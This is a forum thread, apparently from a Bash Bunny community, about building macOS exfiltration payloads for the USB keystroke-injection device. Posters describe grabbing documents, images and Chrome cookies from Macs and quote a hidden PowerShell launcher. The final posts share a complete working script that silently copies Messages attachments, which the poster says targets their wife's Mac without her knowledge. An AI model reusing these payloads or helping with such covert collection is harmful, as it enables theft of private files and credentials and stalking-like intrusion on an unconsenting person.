Jump to content
WiFiJuice

OS X Payloads

Recommended Posts

@WiFiJuice I've been at this for a long time, as I bought the BB when it was first released. However, the following payloads never worked for me, and I was constantly looking for feedback over at Github: MacReverseShell, MacGetUsers, MacPFDExfil, etc. However, the one that has worked, and is easily modifiable to grab files from multiple directories, is macinfograbber. Great payload and I tip my hat to @kmakblob for this. Any other questions, please feel free to hit me up anytime :-)

  • Like 1

Share this post


Link to post
Share on other sites

Granted this was my first attempt at running a payload from the BB on Mac OSX but even after choosing the correct ethernet device, the nmap payload failed because OSX requires root to run the OS fingerprinting functions. NMAP has been this way for a long time (even prior to the security upgrades introduced a couple of versions ago).

Working at an art school we run MacOS everywhere (80-90% of our machines across academic and administrative units)

I'll keep poking at it, but if anyone has an easy fix, I'm all ears.

Share this post


Link to post
Share on other sites

Thank you @WiFiJuice. Macinfograbber, after altering code parameters, will fetch any document you'd like. I have mine set to go to the Desktop, Documents, and Home directories, and exfiltrate DOC, DOCX, PDF, PNG, JPG, JPEG, MOV, XLS, XLSX and more! I've tested the rewrite on several Macs and don't you know- it works on them all!

However, @couchTornado has a valid point regarding NMAP and OSX. I'll start to work on something and share my results either here or on Github. Just a thought before I log off, but if NMAP can't be used, what if we just call upon something inherent to Terminal? Such as:

  • Scan the available wireless networks: /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s
  • Setup a network listener on port 2196 for testing: /usr/bin/nc -l 2196

  • Capture some packets: tcpdump -nS

  • Capture all the packets:tcpdump -nnvvXS

  • Capture the packets for a given port: tcpdump -nnvvXs 548

These are just a couple of things to consider while I toil away with a proper OSX NMAP hack.

Cheers!

Share this post


Link to post
Share on other sites

@WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github etc...? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone! :ph34r:

Share this post


Link to post
Share on other sites
3 hours ago, Opticon said:

@WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github etc...? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone! :ph34r:

@Opticon just sent you a DM :)

Share this post


Link to post
Share on other sites

For reasons unknown to myself, MacOS or OSX has been greatly overlooked where the Bash Bunny is concerned. Having extensive knowledge of the architecture to make an actual Mac exfiltration possible led me to this script. Previous deprecated versions of the original may exist, however, they were myopic in scope and failed upon execution. Allow me to introduce Mac Master Exfil, or MME 1.0, which I hope will guide other Mac enthusiasts to add to this project. It is currently pending approval at Github. DM me for the code. Thank you all :-)

  • Like 1

Share this post


Link to post
Share on other sites

Well @WiFiJuice I'll get working on it. However, here's a pertinent question, what firmware are you currently using? I've found 1.2 to be the most reliable firmware for the Bash Bunny. I've had nothing but trouble with 1.3. Restores and switches that won't execute payloads etc. What are your thoughts? I invite the entire community @couchTornado @Firestorm @Sebkinne @Darren Kitchen et al to answer.

-Cheers

Share this post


Link to post
Share on other sites

Please don't tag everyone like that, if they deem it important enough for them to give their answer (Sebkinne answers if no one else has, or if he wants to add to something or if he wants to confirm something - but Darren rarely does). Not to mention you left me out ... :(

I myself have had no problems with firmware 1.3, and most of the payload library works with 1.3, therefore not working with 1.2 very well. Not sure why you would be getting weird switch errors..

Share this post


Link to post
Share on other sites

How can I make something like this without Powershell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows:

QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"

 

 

Share this post


Link to post
Share on other sites
2 hours ago, WiFiJuice said:

How can I make something like this without Powershell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows:

QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"

 

 

Use python.  Do not have the code off the top of my head right now but when I get around to it (too much at work right now and part of too many projects) I plan on making the BBTPS cross platform with the OSX and Linux agent parts being done in python.

 

Issue with the above is I know on Linux you need to be root or using sudo to mount a removable drive.  That is the reason I chose the network approach for the BBTPS so I do not have to worry about mounting anything on the victim.

 

 

Share this post


Link to post
Share on other sites

@WiFiJuice You bring up an excellent point, one that I would wished the developers would have anticipated. Hopefully, as you've addressed this problem before, they will look into resolving language files. Perhaps it's the reason my payload didn't work for you, but that's only speculation.

  • Like 1

Share this post


Link to post
Share on other sites
2 hours ago, WiFiJuice said:

The Swedish language file is wrong @Sebkinne for example it can't write out a "~" correctly and messes up my code... How can this be fixed?

 

 

Im also using the swedish keyboard layout. As with my experience the language file works great on windows but as you said spells out the character wrong. 

Share this post


Link to post
Share on other sites

It appears that to type ~ on Mac with Swedish Pro layout which most Swedish user do, it's alt + ¨ which the mac interprets as ~. So the keyboard file has to be changed.

Share this post


Link to post
Share on other sites
5 minutes ago, RazerBlade said:

It appears that to type ~ on Mac with Swedish Pro layout which most Swedish user do, it's alt + ¨ which the mac interprets as ~. So the keyboard file has to be changed.

Yes, that that little character is really important to be able to write out something like "~/Library/Application\\ Support/Google/Chrome/Default/Cookies"

Share this post


Link to post
Share on other sites

This is the layout of the Swedish Pro Keyboard. The se.json file in https://github.com/hak5/bashbunny-payloads/tree/master/languages is corrupt. It can't write out the very important Tilde sign " ~ " nor can it write out a backslash " \ ". Can anyone please help out to fix this issue? I will donate $50 in BTC to the one that fixes this, as I really need my BB to work.

swedish_notebook.png

  • Like 1

Share this post


Link to post
Share on other sites

 

@Opticon do you have a git repository with some of your modifications? Im working on modifying InfoGrabber to retrieve pictures send via text from my wife's mac before she has to return it to work, but I cant get the following to work:

QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;

script dies at this line with output  find: -exec: no terminating ";" or "+"

cant find any documentation on what may be happening.

Any help would be great.

 

Share this post


Link to post
Share on other sites
1 minute ago, ImInAjar said:

 

@Opticon do you have a git repository with some of your modifications? Im working on modifying InfoGrabber to retrieve pictures send via text from my wife's mac before she has to return it to work, but I cant get the following to work:

QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;

script dies at this line with output  find: -exec: no terminating ";" or "+"

cant find any documentation on what may be happening.

Any help would be great.

 

Full script:

#!/bin/bash
LED G R
ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E

lootdir=loot/MacLoot
mkdir -p /root/udisk/$lootdir

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 5000
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/images
QUACK ENTER
QUACK DELAY 500
QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;
QUACK ENTER

# Sync filesystem
sync

# Green LED for finished
LED G

files=$(ls /Volumes/BashBunny/$lootdir/images/{*.jpg,*.jpeg,*.png} 2> /dev/null | wc -l)
files2=$(ls /Volumes/BashBunny/$lootdir/images/{*.jpg,*.jpeg,*.png} 2> /dev/null | wc -l)

if [ "$files" != "0" -o "$files2" != "0"]; then
  # Got spreadsheet files
  LED R B
else
  LED R
  # No spread sheets
fi

#Eject BB
QUACK diskutil unmount BashBunny; killall terminal

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...